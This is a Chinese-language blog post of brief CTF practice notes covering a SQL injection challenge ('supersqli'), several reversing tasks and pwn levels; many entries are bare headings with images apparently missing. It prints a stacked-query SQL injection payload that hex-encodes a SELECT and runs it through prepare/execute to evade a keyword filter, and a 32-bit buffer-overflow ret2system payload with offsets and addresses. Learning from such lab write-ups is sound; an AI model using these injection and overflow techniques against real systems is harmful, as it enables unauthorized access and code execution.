date
Aug 5, 2021 12:02 PM
Related to 日程数据 1 (blog)
tags
slug
summary
icon
category
password
0x0e supersqli



因为select被过滤了,所以先将select * from1919810931114514
进行16进制编码 再通过构造payload得 ;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;# 进而得到flag prepare…from…是预处理语句,会进行编码转换。 execute用来执行由SQLPrepare创建的SQL语句。 SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
open-source
atoi (表示ascii to integer)
./string 51966 25 h4cky0u
或者 去判断

hello ctf


simple-unpack


这是有壳啊




logmein




适量N


no-strings-attached


X追踪一下


要解密


getit


csaw2013reversing2


打开是必须勾选以写入模式加载





参考
EasyRE
看见奇怪的东西

是个幌子

逆向算法
翻车
level0

没啥东西

有提示 点进去

可以输入0x200的东西 but *buf的长度为0x80


level2

漏洞函数在前


0x88 可被0x100覆盖溢出
找想要跳的add system 函数
0x08048320

需要system('/bin/shell') 找到字符
0x0804a024

构建pyalod

payload=b'a'*(0x88+0x4)+p32(
0x08048320
)+p32(0)+p32(0x0804a024
)
两种方式都可以
level3
- 作者:lea
- 链接:https://ofai.stream/89f36889b5af41fb8ab5fee6ac1c2e4d
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。